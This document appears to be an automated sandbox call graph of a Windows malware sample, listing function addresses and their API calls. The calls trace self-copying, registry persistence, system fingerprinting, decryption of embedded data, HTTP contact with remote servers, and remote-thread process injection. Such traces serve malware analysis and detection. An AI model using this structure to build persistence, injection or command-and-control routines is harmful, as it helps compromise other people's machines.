3976->3979 3977->3975 3977->3979 4049 10001d10 3977->4049 3979->3941 3981 4003b0d 3980->3981 4057 4002ed0 3981->4057 3983 4003b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 4060 4004510 3983->4060 3985 400400a ExitProcess 3986 4003b54 3986->3985 4078 4005700 3986->4078 3990 4003b9f 4112 4009400 3990->4112 3996 4003be1 4129 4005e00 CreateMutexA GetLastError 3996->4129 3998 4003beb StrStrIA 4130 4001120 3998->4130 4009 4003c92 4178 4005b50 4009->4178 4014 4003df8 4018 4003e30 4014->4018 4218 40078d0 4014->4218 4016 4004020 257 API calls 4016->4018 4017 4003fed Sleep 4017->4018 4018->4016 4018->4017 4021 4003f09 4018->4021 4205 4007970 4018->4205 4021->4018 4022 4003f62 VirtualFree 4021->4022 4222 40042e0 4021->4222 4227 4004020 4021->4227 4022->4021 4024 100016d7 4023->4024 4025 100016d2 4023->4025 4026 100019d0 VirtualFree 4024->4026 4025->3944 4030 1000170b 4026->4030 4027 10001770 GetProcessHeap HeapFree 4027->4025 4029 100019d0 VirtualFree 4029->4027 4030->4027 4030->4029 4031->3957 4033 10001857 4032->4033 4033->3964 4033->3965 4035 10001a35 4034->4035 4036 10001a2c 4034->4036 4039 10001a43 4035->4039 4042 100019f0 VirtualAlloc 4035->4042 4043 10001900 4036->4043 4039->3968 4039->3971 4040 10001a51 4040->4039 4046 100019d0 4040->4046 4042->4040 4044 10001910 VirtualQuery 4043->4044 4045 1000190c 4043->4045 4044->4045 4045->4035 4047 100019d9 VirtualFree 4046->4047 4048 100019ea 4046->4048 4047->4048 4048->4039 4050 10001d29 4049->4050 4054 10001d1f 4049->4054 4051 10001d37 4050->4051 4052 10001d9d VirtualProtect 4050->4052 4051->4054 4056 10001820 VirtualFree 4051->4056 4052->4054 4054->3977 4056->4054 4250 4003090 GetPEB 4057->4250 4059 4002edf 4059->3983 4061 40047e6 4060->4061 4062 4004528 4060->4062 4061->3986 4062->4061 4063 400455b GetModuleFileNameA CreateFileA 4062->4063 4063->4061 4064 40045a4 GetFileSize 4063->4064 4065 40047d0 4064->4065 4066 40045c6 VirtualAlloc 4064->4066 4065->4061 4067 40047d9 CloseHandle 4065->4067 4066->4065 4068 40045ef ReadFile 4066->4068 4067->4061 4069 4004625 4068->4069 4070 400466f 4068->4070 4069->4070 4072 4004637 FindCloseChangeNotification 4069->4072 4070->4065 4071 40047b2 VirtualFree 4070->4071 4071->4065 4251 40047f0 4072->4251 4075 4004681 VirtualFree 4077 400469f 4075->4077 4076 40047f0 15 API calls 4076->4077 4077->4070 4077->4076 4079 4003b84 4078->4079 4080 4005717 4078->4080 4099 4005a00 4079->4099 4271 4008f80 4080->4271 4086 4005773 4340 4005cd0 4086->4340 4089 40057d1 4090 40057e6 GetAllUsersProfileDirectoryA 4089->4090 4091 40057f9 GetEnvironmentVariableA 4089->4091 4092 4005810 wnsprintfA CreateFileA 4090->4092 4091->4092 4092->4079 4093 4005867 GetFileSize 4092->4093 4094 4005886 VirtualAlloc 4093->4094 4095 4005918 FindCloseChangeNotification 4093->4095 4094->4095 4096 40058ab ReadFile 4094->4096 4095->4079 4097 4005904 VirtualFree 4096->4097 4098 40058e4 4096->4098 4097->4095 4098->4095 4100 4005b44 4099->4100 4101 4005a18 4099->4101 4100->3990 4101->4100 4102 4005a3a lstrcpyA 4101->4102 4365 4005930 4102->4365 4104 4005a62 4105 4005a74 lstrlenA 4104->4105 4105->4100 4106 4005a8c lstrcpyA lstrlenA lstrlenA 4105->4106 4106->4100 4107 4005abf lstrcatA RegCreateKeyExA 4106->4107 4108 4005b16 4107->4108 4109 4005b0a RegCloseKey 4107->4109 4111 4005b25 lstrcpyA 4108->4111 4110 4005b37 lstrlenA 4109->4110 4110->4100 4111->4110 4113 4003bcf 4112->4113 4114 400941a 4112->4114 4118 40099f0 GetCurrentProcess OpenProcessToken 4113->4118 4114->4113 4117 4009502 lstrcpyA CharUpperA 4114->4117 4369 4008bb0 4114->4369 4385 4009650 4114->4385 4117->4114 4119 4009a1f GetTokenInformation 4118->4119 4126 4003bd7 4118->4126 4120 4009a50 GetTokenInformation 4119->4120 4121 4009b76 CloseHandle 4119->4121 4120->4121 4122 4009a85 CreateWellKnownSid EqualSid 4120->4122 4121->4126 4123 4009ad4 CreateWellKnownSid EqualSid 4122->4123 4122->4126 4124 4009b0a CreateWellKnownSid EqualSid 4123->4124 4123->4126 4125 4009b40 CreateWellKnownSid EqualSid 4124->4125 4124->4126 4125->4121 4125->4126 4127 4006060 GetModuleFileNameA 4126->4127 4128 4006091 4127->4128 4128->3996 4129->3998 4131 400113a 4130->4131 4145 4001289 4130->4145 4132 4001144 lstrlenA 4131->4132 4131->4145 4133 4001156 lstrlenA 4132->4133 4132->4145 4134 4001168 4133->4134 4133->4145 4135 4001177 GetAllUsersProfileDirectoryA 4134->4135 4136 400118a GetEnvironmentVariableA 4134->4136 4137 40011a1 wnsprintfA lstrcmpiA 4135->4137 4136->4137 4138 4001216 4137->4138 4139 40011db 4137->4139 4394 40097a0 GetProcessHeap RtlAllocateHeap 4138->4394 4139->4138 4140 40011e3 CopyFileA SetFileAttributesA lstrcpyA 4139->4140 4140->4138 4142 4001220 lstrcpyA lstrcpyA CreateThread 4143 40012a3 4142->4143 4142->4145 4395 40012d0 4142->4395 4144 40097c0 2 API calls 4143->4144 4144->4145 4146 4005e30 4145->4146 4147 4005e64 RegOpenKeyExA 4146->4147 4148 4005e5d 4146->4148 4149 4005e8c RegQueryValueExA 4147->4149 4150 4003c39 4147->4150 4148->4147 4151 4005edc 4149->4151 4152 4005ebc 4149->4152 4157 4006cf0 4150->4157 4153 4005f15 RegCloseKey 4151->4153 4401 4009bd0 4151->4401 4152->4151 4154 4005ece RegDeleteValueA 4152->4154 4153->4150 4154->4151 4158 4006d13 RegOpenKeyExA 4157->4158 4159 4006d0c 4157->4159 4160 4006d3a RegQueryValueExA 4158->4160 4161 4003c4d 4158->4161 4159->4158 4162 4006d70 RegDeleteValueA 4160->4162 4163 4006d84 RegCloseKey 4160->4163 4164 4005f30 4161->4164 4162->4163 4163->4161 4405 4007d20 4164->4405 4167 4005f92 4168 4005f99 RegOpenKeyExA 4167->4168 4169 4005fc1 RegQueryValueExA 4168->4169 4170 4003c58 4168->4170 4171 4005ffc 4169->4171 4175 4009b90 4170->4175 4172 4006041 RegCloseKey 4171->4172 4173 4009bd0 QueryPerformanceCounter 4171->4173 4172->4170 4174 4006020 RegSetValueExA 4173->4174 4174->4172 4176 4009ba0 QueryPerformanceCounter 4175->4176 4177 4003c71 WSAStartup 4175->4177 4176->4177 4177->3985 4177->4009 4179 4005b67 4178->4179 4180 4003dac 4178->4180 4179->4180 4181 4005b7b lstrlenA lstrlenA 4179->4181 4192 4008a70 4180->4192 4182 4005ba3 4181->4182 4183 4005be0 VirtualAlloc 4182->4183 4184 4005bab StrStrIA 4182->4184 4183->4180 4186 4005c09 4183->4186 4184->4182 4185 4005bdc 4184->4185 4185->4183 4187 4005c7f 4186->4187 4188 4005c1f StrStrIA 4186->4188 4187->4180 4189 4005c91 VirtualAlloc 4187->4189 4188->4187 4190 4005c39 lstrcpynA 4188->4190 4189->4180 4191 4005cad 4189->4191 4190->4186 4191->4180 4193 4008ba3 4192->4193 4194 4008a87 4192->4194 4193->4014 4194->4193 4195 4008ab9 CryptAcquireContextA 4194->4195 4196 4008b12 4195->4196 4197 4008add GetLastError 4195->4197 4196->4193 4200 4008b1c CryptImportKey 4196->4200 4198 4008af8 CryptAcquireContextA 4197->4198 4199 4008aef 4197->4199 4198->4196 4199->4196 4199->4198 4201 4008b41 CryptImportKey 4200->4201 4202 4008b97 CryptReleaseContext 4200->4202 4203 4008b68 CryptDecrypt CryptDestroyKey 4201->4203 4204 4008b8d CryptDestroyKey 4201->4204 4202->4193 4203->4204 4204->4202 4206 4007987 VirtualAlloc 4205->4206 4207 4007ae9 4205->4207 4206->4207 4208 40079b6 4206->4208 4207->4018 4407 400a400 4208->4407 4211 4007ad8 VirtualFree 4211->4207 4212 4008a70 9 API calls 4213 4007a15 4212->4213 4213->4211 4214 4007a20 VirtualAlloc 4213->4214 4214->4211 4216 4007a5a 4214->4216 4215 4007ad0 4215->4211 4216->4215 4217 4007a89 inet_ntoa wnsprintfA 4216->4217 4217->4216 4219 40078e4 4218->4219 4220 4007965 4218->4220 4219->4220 4221 4007927 inet_ntoa wnsprintfA 4219->4221 4220->4018 4221->4219 4223 40044fd 4222->4223 4224 40042fa VirtualAlloc 4222->4224 4223->4021 4224->4223 4226 40044a3 4224->4226 4226->4223 4414 40092e0 4226->4414 4228 40042d7 4227->4228 4229 4004034 4227->4229 4228->4021 4229->4228 4230 400405f InitializeCriticalSection CreateEventA 4229->4230 4231 400409f 4230->4231 4232 40040ab EnterCriticalSection 4231->4232 4233 40042cd DeleteCriticalSection 4231->4233 4234 40040da 4232->4234 4235 40040bb VirtualFree 4232->4235 4233->4228 4236 40040e0 TerminateThread 4234->4236 4237 40040f3 ResetEvent LeaveCriticalSection CreateThread 4234->4237 4235->4234 4236->4237 4422 40097a0 GetProcessHeap RtlAllocateHeap 4237->4422 4476 4004ac0 4237->4476 4239 4004221 WaitForMultipleObjects WaitForSingleObject 4240 400424b 4239->4240 4241 400424f WaitForSingleObject 4239->4241 4240->4241 4242 4004273 EnterCriticalSection 4241->4242 4243 4004267 TerminateThread 4241->4243 4244 40042a2 LeaveCriticalSection 4242->4244 4245 4004283 VirtualFree 4242->4245 4243->4242 4247 40097c0 2 API calls 4244->4247 4245->4244 4246 400413a 4246->4239 4248 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 4246->4248 4249 40042bb 4247->4249 4248->4246 4423 4004ba0 CoInitialize 4248->4423 4249->4233 4250->4059 4252 4004807 4251->4252 4253 4004665 4251->4253 4252->4253 4254 4004814 CryptAcquireContextA 4252->4254 4253->4070 4253->4075 4253->4077 4255 4004834 GetLastError 4254->4255 4257 4004856 4254->4257 4256 4004841 CryptAcquireContextA 4255->4256 4255->4257 4256->4257 4257->4253 4258 4004a9f CryptReleaseContext 4257->4258 4259 40048be CryptCreateHash 4257->4259 4258->4253 4260 4004a90 4259->4260 4261 40048f9 CryptHashData 4259->4261 4260->4258 4262 4004a83 CryptDestroyHash 4261->4262 4263 4004919 CryptDeriveKey 4261->4263 4262->4260 4263->4262 4264 400494a CryptDecrypt CryptDestroyKey 4263->4264 4264->4262 4265 4004995 CryptCreateHash 4264->4265 4265->4262 4266 40049b7 CryptHashData 4265->4266 4267 4004a76 CryptDestroyHash 4266->4267 4268 40049da CryptGetHashParam 4266->4268 4267->4262 4268->4267 4269 4004a11 CryptGetHashParam 4268->4269 4269->4267 4270 4004a3e 4269->4270 4270->4267 4272 400572e GetModuleFileNameA 4271->4272 4273 4008f9a 4271->4273 4311 4001ca0 CreateToolhelp32Snapshot 4272->4311 4273->4272 4274 4008fed GetVersionExA 4273->4274 4275 4009005 GetSystemInfo 4274->4275 4276 4009266 4274->4276 4278 4009115 4275->4278 4279 400901c 4275->4279 4276->4272 4277 400926c lstrcatA 4276->4277 4277->4272 4280 4009110 4278->4280 4283 4009174 4278->4283 4284 400912b 4278->4284 4281 4009042 4279->4281 4282 4009025 lstrcatA 4279->4282 4350 4009290 GetModuleHandleA GetProcAddress 4280->4350 4286 4009068 4281->4286 4287 400904b lstrcatA 4281->4287 4282->4280 4288 40091c3 4283->4288 4289 400917d 4283->4289 4290 4009134 lstrcatA 4284->4290 4291 400914e 4284->4291 4286->4280 4298 40090a1 GetSystemMetrics 4286->4298 4299 4009087 lstrcatA 4286->4299 4287->4280 4288->4280 4303 40091d5 lstrcatA 4288->4303 4304 40091ef 4288->4304 4293 40091a0 4289->4293 4294 4009186 lstrcatA 4289->4294 4290->4280 4291->4280 4295 4009157 lstrcatA 4291->4295 4293->4280 4302 40091a9 lstrcatA 4293->4302 4294->4280 4295->4280 4296 4009228 lstrlenA 4305 4009259 lstrlenA 4296->4305 4306 4009239 lstrcatA lstrcatA 4296->4306 4297 4009219 lstrcatA 4297->4296 4300 40090c7 GetSystemMetrics 4298->4300 4301 40090ad lstrcatA 4298->4301 4299->4280 4307 40090d3 lstrcatA 4300->4307 4308 40090ed 4300->4308 4301->4280 4302->4280 4303->4280 4304->4280 4309 40091f8 lstrcatA 4304->4309 4305->4276 4306->4305 4307->4280 4308->4280 4310 40090f8 lstrcatA 4308->4310 4309->4280 4310->4280 4312 4001e51 4311->4312 4313 4001cc9 Process32First 4311->4313 4329 4009d20 4312->4329 4314 4001e44 CloseHandle 4313->4314 4315 4001cee GetCurrentProcessId 4313->4315 4314->4312 4316 4001d04 4315->4316 4317 4001d20 Process32Next 4316->4317 4318 4001d12 4316->4318 4317->4316 4317->4318 4318->4314 4319 4001d44 Process32First 4318->4319 4319->4314 4320 4001d5f 4319->4320 4321 4001d71 lstrlenA 4320->4321 4322 4001e29 Process32Next 4320->4322 4323 4001e27 4321->4323 4324 4001d87 lstrcpyA OpenProcess 4321->4324 4322->4314 4322->4320 4323->4314 4324->4323 4325 4001dbb EnumProcessModules 4324->4325 4326 4001e02 GetProcessImageFileNameA 4325->4326 4327 4001de5 GetModuleFileNameExA 4325->4327 4328 4001e16 FindCloseChangeNotification 4326->4328 4327->4328 4328->4323 4330 4009d37 4329->4330 4331 4009f5d 4329->4331 4330->4331 4332 4009d4b GetSystemDirectoryA 4330->4332 4331->4086 4332->4331 4333 4009da8 GetVolumeInformationA 4332->4333 4333->4331 4334 4009deb 4333->4334 4353 4009f70 4334->4353 4338 4009f50 CoTaskMemFree 4338->4331 4339 4009f0c WideCharToMultiByte lstrcpynA 4339->4338 4341 4005ce7 lstrlenA 4340->4341 4342 400579d lstrcpyA 4340->4342 4341->4342 4343 4005cfa CreateFileA 4341->4343 4342->4089 4343->4342 4344 4005d23 GetFileSize 4343->4344 4345 4005d38 VirtualAlloc 4344->4345 4346 4005d9f FindCloseChangeNotification 4344->4346 4345->4346 4347 4005d54 ReadFile 4345->4347 4346->4342 4348 4005d7b 4347->4348 4349 4005d8e VirtualFree 4347->4349 4348->4349 4349->4346 4351 4009215 4350->4351 4352 40092bd GetCurrentProcess 4350->4352 4351->4296 4351->4297 4352->4351 4354 4009f87 4353->4354 4355 4009e2d StringFromCLSID 4353->4355 4354->4355 4361 40097a0 GetProcessHeap RtlAllocateHeap 4354->4361 4355->4338 4355->4339 4357 4009fb2 4357->4355 4358 4009fc8 GetAdaptersInfo 4357->4358 4360 4009ff4 4358->4360 4362 40097c0 4360->4362 4361->4357 4363 40097c9 GetProcessHeap RtlFreeHeap 4362->4363 4364 40097dc 4362->4364 4363->4364 4364->4355 4366 40059f3 4365->4366 4367 4005949 4365->4367 4366->4104 4367->4366 4368 40059de CharUpperA 4367->4368 4368->4367 4370 4008ce7 4369->4370 4371 4008bc7 4369->4371 4370->4114 4371->4370 4372 4008be5 CryptAcquireContextA 4371->4372 4373 4008c09 GetLastError 4372->4373 4374 4008c3e 4372->4374 4375 4008c24 CryptAcquireContextA 4373->4375 4376 4008c1b 4373->4376 4374->4370 4377 4008c48 CryptCreateHash 4374->4377 4375->4374 4376->4374 4376->4375 4378 4008c63 CryptHashData 4377->4378 4379 4008cdb CryptReleaseContext 4377->4379 4380 4008cd1 CryptDestroyHash 4378->4380 4381 4008c7b CryptGetHashParam 4378->4381 4379->4370 4380->4379 4381->4380 4382 4008ca3 4381->4382 4382->4380 4383 4008cab CryptGetHashParam 4382->4383 4383->4380 4384 4008ccb 4383->4384 4384->4380 4386 4009722 4385->4386 4387 4009667 4385->4387 4386->4114 4387->4386 4388 4009685 lstrlenA 4387->4388 4392 4009699 4388->4392 4389 40096fd lstrlenA 4390 4009715 lstrlenA 4389->4390 4391 400970c 4389->4391 4390->4386 4391->4390 4392->4389 4393 40096d4 lstrcatA lstrlenA 4392->4393 4393->4392 4394->4142 4396 40012fc 4395->4396 4397 40012e6 4395->4397 4397->4396 4398 400131d RegOpenKeyExA 4397->4398 4399 4001341 lstrlenA RegSetValueExA RegCloseKey 4398->4399 4400 4001378 Sleep 4398->4400 4399->4400 4400->4397 4402 4005ef6 RegSetValueExA 4401->4402 4403 4009bda 4401->4403 4402->4153 4403->4402 4404 4009b90 QueryPerformanceCounter 4403->4404 4404->4403 4406 4005f58 lstrcpyA lstrcatA 4405->4406 4406->4167 4406->4168 4408 400a417 4407->4408 4409 40079d2 4407->4409 4408->4409 4410 400a442 RegOpenKeyExA 4408->4410 4409->4211 4409->4212 4410->4409 4411 400a466 RegQueryValueExA 4410->4411 4412 400a490 RegCloseKey 4411->4412 4413 400a48a 4411->4413 4412->4409 4413->4412 4415 40093f8 4414->4415 4416 40092fa 4414->4416 4415->4226 4416->4415 4417 4009304 GetLocalTime 4416->4417 4418 4009322 4417->4418 4418->4415 4419 4008bb0 9 API calls 4418->4419 4420 4009650 5 API calls 4418->4420 4419->4418 4421 40093c9 lstrcatA 4420->4421 4421->4418 4422->4246 4424 40056f0 CoUninitialize 4423->4424 4425 4004bc2 4423->4425 4426 4004bd1 SetEvent 4425->4426 4427 4004bf9 4426->4427 4427->4424 4428 4004c10 WaitForSingleObject 4427->4428 4429 4004c28 VirtualAlloc VirtualAlloc VirtualAlloc 4427->4429 4428->4429 4430 4004c23 4428->4430 4429->4430 4431 4004c8a 4429->4431 4430->4424 4431->4430 4434 4004cc3 4431->4434 4435 40052a2 4431->4435 4439 4004db7 GetCurrentThreadId 4434->4439 4440 4004e2c 4434->4440 4449 4004ce5 4434->4449 4489 4008370 4435->4489 4436 4005354 lstrlenA lstrlenA 4437 40056b8 VirtualFree VirtualFree VirtualFree 4436->4437 4438 4005385 wsprintfA CryptBinaryToStringA 4436->4438 4437->4430 4438->4437 4441 40053d0 MultiByteToWideChar 4438->4441 4439->4449 4442 4004ee1 4440->4442 4443 4004e81 GetSystemMetrics GetSystemMetrics 4440->4443 4440->4449 4508 40017d0 4441->4508 4446 4004f40 4442->4446 4447 4004ef0 GlobalMemoryStatus 4442->4447 4443->4449 4446->4449 4452 4005032 4446->4452 4453 4004fdf lstrlenA 4446->4453 4447->4449 4448 400569b 4448->4437 4450 40056a4 VirtualFree 4448->4450 4450->4437 4451 400547d VirtualFree 4473 40054b1 4451->4473 4455 4005041 lstrlenA 4452->4455 4456 4005096 4452->4456 4453->4449 4454 400552c EnterCriticalSection 4459 4005542 VirtualAlloc 4454->4459 4460 400558c VirtualAlloc 4454->4460 4455->4449 4457 4005104 4456->4457 4458 40050a5 lstrlenA 4456->4458 4463 4005172 4457->4463 4464 4005113 lstrlenA 4457->4464 4458->4449 4462 4005578 4459->4462 4465 40055c7 GetTickCount 4460->4465 4466 400568e LeaveCriticalSection 4460->4466 4461 40017d0 16 API calls 4461->4473 4462->4466 4467 40051e0 4463->4467 4468 4005181 lstrlenA 4463->4468 4464->4449 4474 40055da 4465->4474 4466->4448 4470 400523f 4467->4470 4471 40051ef lstrlenA 4467->4471 4468->4449 4469 400551b 4469->4448 4469->4454 4470->4449 4472 4009b90 QueryPerformanceCounter 4470->4472 4471->4449 4472->4449 4473->4461 4473->4469 4475 400565c VirtualFree 4474->4475 4475->4466 4477 4004b96 4476->4477 4478 4004ad6 CoInitialize 4476->4478 4479 4004ade 4478->4479 4480 4004b80 Sleep 4479->4480 4481 4004aeb WaitForSingleObject 4479->4481 4480->4479 4481->4480 4482 4004b01 EnterCriticalSection 4481->4482 4566 4008250 4482->4566 4485 4004b50 4571 40062b0 4485->4571 4488 4004b90 CoUninitialize 4488->4477 4490 4005344 4489->4490 4491 4008387 4489->4491 4490->4436 4490->4437 4491->4490 4492 40083b1 VirtualAlloc VirtualAlloc 4491->4492 4493 4008592 4492->4493 4494 40083e9 4492->4494 4495 4008598 VirtualFree 4493->4495 4496 40085a9 4493->4496 4494->4493 4512 4008800 4494->4512 4495->4496 4496->4490 4498 40085af VirtualFree 4496->4498 4498->4490 4504 400847e 4534 4008970 4504->4534 4506 4008581 VirtualFree 4506->4493 4507 40084ad 4507->4506 4509 40017e1 4508->4509 4511 400181e 4508->4511 4509->4511 4545 4001840 4509->4545 4511->4448 4511->4451 4511->4469 4513 4008817 4512->4513 4514 4008420 4512->4514 4513->4514 4515 4008821 CryptAcquireContextA 4513->4515 4514->4493 4528 4008770 4514->4528 4516 4008845 GetLastError 4515->4516 4517 400887a 4515->4517 4518 4008860 CryptAcquireContextA 4516->4518 4519 4008857 4516->4519 4517->4514 4520 4008884 CryptGenKey 4517->4520 4518->4517 4519->4517 4519->4518 4521 4008950 CryptReleaseContext 4520->4521 4522 40088bd CryptExportKey 4520->4522 4521->4514 4523 4008946 CryptDestroyKey 4522->4523 4524 40088d9 4522->4524 4523->4521 4525 400893d 4524->4525 4526 40088f1 CryptImportKey 4524->4526 4525->4523 4526->4525 4527 4008916 CryptExportKey CryptDestroyKey 4526->4527 4527->4525 4529 40087d0 QueryPerformanceCounter 4528->4529 4530 400844b 4529->4530 4531 40087d0 4530->4531 4532 40087e3 QueryPerformanceCounter 4531->4532 4533 4008458 VirtualAlloc 4531->4533 4532->4533 4533->4493 4533->4504 4535 4008a60 4534->4535 4536 4008987 4534->4536 4535->4507 4536->4535 4537 40089a5 CryptAcquireContextA 4536->4537 4538 40089c9 GetLastError 4537->4538 4539 40089fe 4537->4539 4540 40089e4 CryptAcquireContextA 4538->4540 4541 40089db 4538->4541 4539->4535 4542 4008a04 CryptImportKey 4539->4542 4540->4539 4541->4539 4541->4540 4543 4008a54 CryptReleaseContext 4542->4543 4544 4008a29 CryptEncrypt CryptDestroyKey 4542->4544 4543->4535 4544->4543 4546 4001c95 4545->4546 4547 400185a 4545->4547 4546->4511 4547->4546 4548 40018ba InternetCrackUrlA 4547->4548 4548->4546 4549 4001910 InternetOpenA 4548->4549 4549->4546 4550 4001936 InternetConnectA 4549->4550 4551 4001c88 InternetCloseHandle 4550->4551 4552 400196f HttpOpenRequestA 4550->4552 4551->4546 4553 4001c7b InternetCloseHandle 4552->4553 4554 40019ad wnsprintfA HttpAddRequestHeadersA 4552->4554 4553->4551 4555 40019eb InternetSetOptionA 4554->4555 4556 4001c6e InternetCloseHandle 4554->4556 4558 4001a30 4555->4558 4556->4553 4558->4556 4559 4001a4d HttpSendRequestA 4558->4559 4561 4001adc HttpQueryInfoA 4558->4561 4562 4001b47 VirtualAlloc 4558->4562 4565 4001b99 InternetReadFile 4558->4565 4559->4558 4560 4001a7b HttpQueryInfoA 4559->4560 4560->4558 4561->4558 4561->4562 4562->4558 4563 4001c19 4562->4563 4564 4001c23 InternetReadFile 4563->4564 4564->4558 4564->4564 4565->4558 4567 4004b37 LeaveCriticalSection 4566->4567 4570 4008267 4566->4570 4567->4480 4567->4485 4568 40082e7 StrStrA 4568->4567 4568->4570 4570->4567 4570->4568 4654 4008090 4570->4654 4573 40062ca 4571->4573 4582 4004b5d VirtualFree SetEvent 4571->4582 4572 4006427 4575 40064ba GetEnvironmentVariableA 4572->4575 4580 40065f3 4572->4580 4572->4582 4573->4572 4574 4006399 4573->4574 4573->4582 4577 4006410 4574->4577 4578 40063a4 VirtualAlloc 4574->4578 4579 40064e1 4575->4579 4576 4006bdd 4576->4582 4750 400a360 4576->4750 4583 4001ee0 2 API calls 4577->4583 4581 400640e 4578->4581 4589 40063cc 4578->4589 4676 4009730 4579->4676 4580->4576 4715 4007250 4580->4715 4581->4572 4582->4488 4583->4581 4590 40063fd VirtualFree 4589->4590 4673 4001ee0 CreateThread 4589->4673 4590->4581 4591 4006552 WriteFile 4595 4006588 4591->4595 4596 40065dd 4591->4596 4592 4006752 4601 40069ba GetEnvironmentVariableA 4592->4601 4602 4006858 4592->4602 4603 400678e VirtualAlloc 4592->4603 4593 4006654 VirtualAlloc 4593->4592 4598 400667a 4593->4598 4595->4596 4597 4006593 CloseHandle 4595->4597 4596->4580 4600 40065e6 CloseHandle 4596->4600 4680 4006c60 4597->4680 4727 40097a0 GetProcessHeap RtlAllocateHeap 4598->4727 4600->4580 4605 40069e1 4601->4605 4608 4002070 32 API calls 4602->4608 4606 4006856 4603->4606 4619 40067c6 4603->4619 4610 4009730 QueryPerformanceCounter 4605->4610 4612 40069a6 4606->4612 4616 4006880 4606->4616 4617 4006894 4606->4617 4608->4606 4614 40069f2 GetTickCount GetTempFileNameA CreateFileA 4610->4614 4612->4601 4622 4006a4f 4614->4622 4653 4006bbd 4614->4653 4615 4006698 CreateThread CloseHandle 4615->4592 4731 40073c0 4616->4731 4624 400698a 4617->4624 4738 40097a0 GetProcessHeap RtlAllocateHeap 4617->4738 4618 4006842 VirtualFree 4618->4606 4619->4618 4728 4002070 4619->4728 4620 40065d8 4627 4006cf0 4 API calls 4620->4627 4621 40065c9 4692 40074a0 4621->4692 4628 4006a7b VirtualAlloc 4622->4628 4629 4006b1e WriteFile 4622->4629 4624->4612 4739 4002510 4624->4739 4627->4596 4631 4006b1c 4628->4631 4635 4006aaf 4628->4635 4629->4631 4637 4006bc9 CloseHandle 4631->4637 4640 4006b59 CloseHandle 4631->4640 4644 4006ad2 WriteFile 4635->4644 4645 4006b08 VirtualFree 4635->4645 4637->4653 4638 40068aa 4641 40068e9 VirtualAlloc 4638->4641 4642 40068ca 4638->4642 4639 4006809 VirtualAlloc 4643 400683f 4639->4643 4646 4001e60 2 API calls 4640->4646 4641->4642 4647 400690f 4641->4647 4642->4624 4649 400693f CreateThread CloseHandle 4642->4649 4643->4618 4644->4645 4645->4631 4648 4006b72 4646->4648 4647->4642 4650 4006b9e 4648->4650 4651 40073c0 5 API calls 4648->4651 4648->4653 4649->4624 4778 40077b0 4649->4778 4652 4002510 8 API calls 4650->4652 4650->4653 4651->4650 4652->4653 4653->4576 4655 4008246 4654->4655 4656 40080a7 4654->4656 4655->4570 4656->4655 4657 40080c5 VirtualAlloc 4656->4657 4657->4655 4658 40080eb 4657->4658 4666 4001390 4658->4666 4660 4008100 4662 4008a70 9 API calls 4660->4662 4665 4008204 4660->4665 4661 4008235 VirtualFree 4661->4655 4663 40081dd 4662->4663 4664 40081e4 VirtualAlloc 4663->4664 4663->4665 4664->4665 4665->4655 4665->4661 4667 400139c 4666->4667 4668 40013ae 4666->4668 4667->4668 4669 40013b6 GetProcessHeap RtlAllocateHeap 4667->4669 4668->4660 4669->4668 4670 40013e4 4669->4670 4671 40014e4 GetProcessHeap RtlFreeHeap 4670->4671 4672 4001498 GetProcessHeap HeapFree 4670->4672 4671->4668 4672->4668 4674 4001f0a WaitForSingleObject 4673->4674 4675 4001f21 4673->4675 4674->4675 4675->4590 4677 40064f2 GetTickCount GetTempFileNameA CreateFileA 4676->4677 4679 4009743 4676->4679 4677->4580 4677->4591 4678 4009763 QueryPerformanceCounter 4678->4679 4679->4677 4679->4678 4681 4006c83 RegOpenKeyExA 4680->4681 4682 4006c7c 4680->4682 4683 40065ab 4681->4683 4684 4006ca7 4681->4684 4682->4681 4687 4001e60 4683->4687 4685 4009b90 QueryPerformanceCounter 4684->4685 4686 4006cae RegSetValueExA RegCloseKey 4685->4686 4686->4683 4688 4001ece 4687->4688 4689 4001e73 4687->4689 4688->4620 4688->4621 4690 4001e90 CreateProcessA 4689->4690 4690->4688 4691 4001ebe CloseHandle 4690->4691 4691->4688 4693 40074bc 4692->4693 4694 40074d2 Sleep 4693->4694 4695 40074f5 GetModuleFileNameA 4694->4695 4696 400750b 4694->4696 4697 4007583 SetFileAttributesA wnsprintfA 4695->4697 4698 4007520 GetAllUsersProfileDirectoryA 4696->4698 4699 4007536 GetEnvironmentVariableA 4696->4699 4701 40075d4 RegOpenKeyExA 4697->4701 4702 40075c6 TerminateThread 4697->4702 4700 400754d lstrcatA lstrcatA lstrcatA 4698->4700 4699->4700 4700->4697 4704 400762a RegDeleteValueA RegCloseKey 4701->4704 4705 4007649 4701->4705 4702->4701 4704->4705 4706 400765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 4705->4706 4707 4005e30 6 API calls 4705->4707 4708 40065ce ExitProcess 4706->4708 4709 40076df lstrlenA WriteFile CloseHandle 4706->4709 4710 400765b 4707->4710 4711 4007731 4709->4711 4710->4706 4712 4007744 CreateProcessA 4711->4712 4713 40077a3 ExitProcess 4712->4713 4714 4007796 CloseHandle 4712->4714 4714->4713 4716 4006638 4715->4716 4717 4007264 4715->4717 4716->4592 4716->4593 4717->4716 4718 40072ad wsprintfA 4717->4718 4719 40072d8 4718->4719 4720 40072df RegOpenKeyExA 4718->4720 4719->4720 4720->4716 4721 4007307 RegQueryValueExA 4720->4721 4722 4007333 4721->4722 4723 40073a5 RegCloseKey 4721->4723 4722->4723 4724 4007339 GetLocalTime 4722->4724 4723->4716 4755 4009910 SystemTimeToFileTime SystemTimeToFileTime 4724->4755 4726 4007388 4726->4723 4727->4615 4757 40020b0 4728->4757 4732 4006891 4731->4732 4733 40073d0 4731->4733 4732->4617 4733->4732 4734 4007419 wsprintfA 4733->4734 4735 4007444 4734->4735 4736 400744b RegOpenKeyExA 4734->4736 4735->4736 4736->4732 4737 400746f GetLocalTime RegSetValueExA RegCloseKey 4736->4737 4737->4732 4738->4638 4740 4002573 4739->4740 4741 4002527 4739->4741 4740->4612 4741->4740 4742 4002531 VirtualAlloc 4741->4742 4742->4740 4743 400257a VirtualAllocEx 4742->4743 4744 400259f VirtualAllocEx 4743->4744 4746 40025d7 4743->4746 4745 40025bf VirtualFree 4744->4745 4744->4746 4745->4740 4747 4002653 WriteProcessMemory 4746->4747 4748 4002672 VirtualFree 4747->4748 4749 4002687 VirtualFree CreateRemoteThread 4747->4749 4748->4740 4749->4740 4751 400a3ed 4750->4751 4752 400a370 4750->4752 4751->4582 4752->4751 4753 400a39b RegOpenKeyExA 4752->4753 4753->4751 4754 400a3bf 